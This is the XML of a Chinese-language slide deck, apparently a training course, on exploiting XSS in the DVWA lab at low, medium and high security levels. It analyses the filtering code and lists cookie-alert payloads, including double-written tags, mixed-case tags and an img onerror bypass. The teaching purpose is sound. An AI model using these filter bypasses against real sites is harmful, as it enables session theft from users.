            <a:pPr marL="0" marR="0" indent="457200" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>四、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>medium级别的存储型XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="457200" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>五、low级别的DOM型XSS漏洞利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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751840" y="1828165"/>
            <a:ext cx="10800080" cy="189484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在Web服务服上安装了DVWA平台。访问地址：http://192.168.1.201/dvwa/。</a:t>
            </a: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标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>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5"/>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4" name="表格 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="855980" y="2304000"/>
          <a:ext cx="10558145" cy="995680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1000125"/>
                <a:gridCol w="3966210"/>
                <a:gridCol w="2205355"/>
                <a:gridCol w="3386455"/>
              </a:tblGrid>
              <a:tr h="367665">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>编号</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操作系统</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用途</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Web服务器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498475" y="1325245"/>
            <a:ext cx="10972165" cy="48704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8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2"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ow级别的反射型XSS漏洞利用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6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2278380" y="1835150"/>
            <a:ext cx="7560000" cy="4687533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499110" y="1320165"/>
            <a:ext cx="10925810" cy="1274445"/>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、启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ZAP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在Kali主界面中，点击左上角的应用程序图标   ，点击03-Web程序，点击ZAP，即可启动ZAP。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pP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7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3618865" y="2607945"/>
            <a:ext cx="3881120" cy="3502660"/>
            <a:chOff x="4010" y="3669"/>
            <a:chExt cx="6901" cy="6976"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="图片 2"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect r="1593" b="22985"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4185" y="3703"/>
              <a:ext cx="6726" cy="6943"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="椭圆 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7493" y="9849"/>
              <a:ext cx="652" cy="567"/>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4185" y="7362"/>
              <a:ext cx="652" cy="567"/>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4010" y="3669"/>
              <a:ext cx="652" cy="567"/>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1" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="485775" cy="388620"/>
            <a:chOff x="-9" y="201"/>
            <a:chExt cx="765" cy="612"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="矩形 77"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>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5"/>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2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7225665" y="1860550"/>
            <a:ext cx="266700" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>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任务实施二：</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516572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、查看源代码</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使用arrary_key_exists()函数判断$_GET的值中是否存在“name”键名，并且判断$_GET[‘name’]的值是否不为空，当满足这些条件，“Hello ”与用户输入拼接，直接在网页中输出。</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用户输入没有做任何的过滤与检查，用户输入什么都会被执行。</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2147482561"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1866265"/>
            <a:ext cx="8627110" cy="2776855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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ow级别的反射型XSS漏洞利用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1171555" cy="117919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lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(document.cookie);&lt;/script&gt;，点击“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ubmit”按钮</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r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>弹出用户的Cookie值，攻击成功。</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ow级别的反射型XSS漏洞利用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6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305050" y="2581275"/>
            <a:ext cx="7560000" cy="3855769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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209655" cy="478853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分析medium</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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（1）查看源代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>输入</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做简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>过滤，</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用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>str_replace()函数将输入</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所包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的&lt;script&gt;替换为空。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482555"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523490" y="2210435"/>
            <a:ext cx="7106920" cy="2835910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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226800" cy="488188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分析medium</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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（2）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>构造攻击载荷</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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① 双写绕过</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&lt;sc&lt;script&gt;ript&gt;alert(document.cookie);&lt;/script&gt;</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② 大小写混淆绕过</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zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>       </a:t>
            </a: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&lt;sCrIPt&gt;alert(document.cookie);&lt;/sCrIpT&gt;</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③ 利用img标签进行绕过</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&lt;img src=0 onerror=alert(document.cookie)&gt;</a:t>
            </a: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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150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lang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【解释】&lt;img&gt;标签是添加一个图片，src是指定图片的url，onerror是指定加载图片时，如果出现错误，就会执行的事件，这里我们的图片url肯定是错误的，这个弹框事件也必定会执行。</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017250" cy="170116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分析medium</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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（3）漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100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将当前级别调整为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上分别使用3种攻击载荷进行攻击。都</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>能</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>弹出用户的Cookie值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3种攻击载荷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>都是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有效</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黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击成功。</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4124325" y="3214688"/>
            <a:ext cx="3960000" cy="1291304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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017250" cy="92646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lang="en-US" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>igh级别的反射型XSS源代码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（1）查看源代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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4" name="图片 -2147482554"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1803400" y="2167255"/>
            <a:ext cx="8545830" cy="307911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169650" cy="225679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lang="en-US" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>igh级别的反射型XSS源代码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（2）源代码分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>preg_replace()函数用于正则表达式的搜索和替换，这里凡是带script的都会被过滤，/i的意思是大小写通用，所以双写绕过和大小写混淆绕过都是不行的，但利用img标签绕过是可以的。</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
